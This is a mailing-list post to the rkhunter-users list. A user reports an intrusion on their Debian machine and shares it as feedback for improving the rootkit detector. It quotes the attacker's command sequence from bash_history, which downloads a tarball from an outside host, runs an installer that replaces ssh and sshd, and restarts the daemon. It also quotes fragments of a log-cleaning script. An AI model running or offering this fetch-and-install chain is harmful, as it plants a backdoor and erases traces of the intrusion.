Hi guys, by accident I discovered that I recently have been hacked on my home linux machine.
I could track them through bash_history!! rkhunter did only gave me a warning: OpenSSH 3.4p1 [ Old or patched version ] I debian and my current sshd is build for redhat... i have some binaries in /etc/rpm I'll reinstall from scrath, I just wanna give you feedback so you can improuve rkhunter... here are the files wget -ed on my pc: atikehack.wc.hu/.ssh.tgz members.lycos.co.uk/treeball/hash this hash file is a tar.gz (atacker have run: ============= wget members.lycos.co.uk/treeball/hash tar xzvf hash rm -rf hash cd back chmod +x * ./inst /etc/init.d/sshd restart /etc/init.d/sshd restart service sshd restart sshd restart w php -v =============== I also find a file named 'hide' - a lame script that delets stuff from log sample from this file: you will see that whis inst script overwrites ssh, sshd, sftp snd scp echo " Linux Hider v2.0 by Atike" echo " enhanced by me! " echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ." echo "" .... Hope it helps, ------------------------------------------------------------------------- SF.Net email is sponsored by: Check out the new SourceForge.net Marketplace. It's the best place to buy or sell services for just about anything Open Source. http://sourceforge.net/services/buy/index.php _______________________________________________ Rkhunter-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/rkhunter-users
